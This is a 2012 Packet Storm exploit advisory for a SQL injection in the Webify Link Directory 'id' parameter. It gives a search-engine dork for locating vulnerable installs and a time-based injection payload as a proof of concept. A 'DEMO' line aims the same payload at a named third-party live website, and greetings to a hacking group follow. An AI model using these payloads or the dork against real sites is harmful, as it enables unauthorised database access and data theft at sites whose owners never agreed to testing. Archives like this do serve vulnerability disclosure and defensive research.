Webify Link Directory SQL Injection

2012-07-04T00:00:00
ID PACKETSTORM:114474
Type packetstorm
Reporter Daniel Godoy
Modified 2012-07-04T00:00:00

Description

                                        
                                            `# Exploit Title: Webify Link Directory / SQL Injection  
# Date: 04/07/2012  
# Author: Daniel Godoy  
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com  
# Author Web: www.delincuentedigital.com.ar  
# Sofware web: http://webify.ws/index.php?page=getapp&id=10  
# Tested on: Linux  
# Dork: allinurl: index.php?page=browse&id=1  
#  
# www.chap.cl  
# Este Advisory fue descubierto por Daniel Godoy, integrante de  
Project CHAP Security  
# be secured / stay secure  
# contacto@chap.cl  
  
[Comment]  
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,  
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,  
InyeXion, ksha, zerial,LinuxFer, Scorp  
her0, r0dr1 y demas user de RemoteExecution  
www.remoteexecution.info www.remoteexcution.com.ar  
#RemoteExecution Hacking Group  
  
[PoC]  
  
http://localhost/index.php?page=browse&id=1' AND SLEEP(0) AND  
'chap'='chap  
  
[DEMO]  
  
http://grandrapidslinks.com/index.php?page=browse&id=1' AND SLEEP(0)  
AND 'chap'='chap  
  
-------------------------  
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com  
`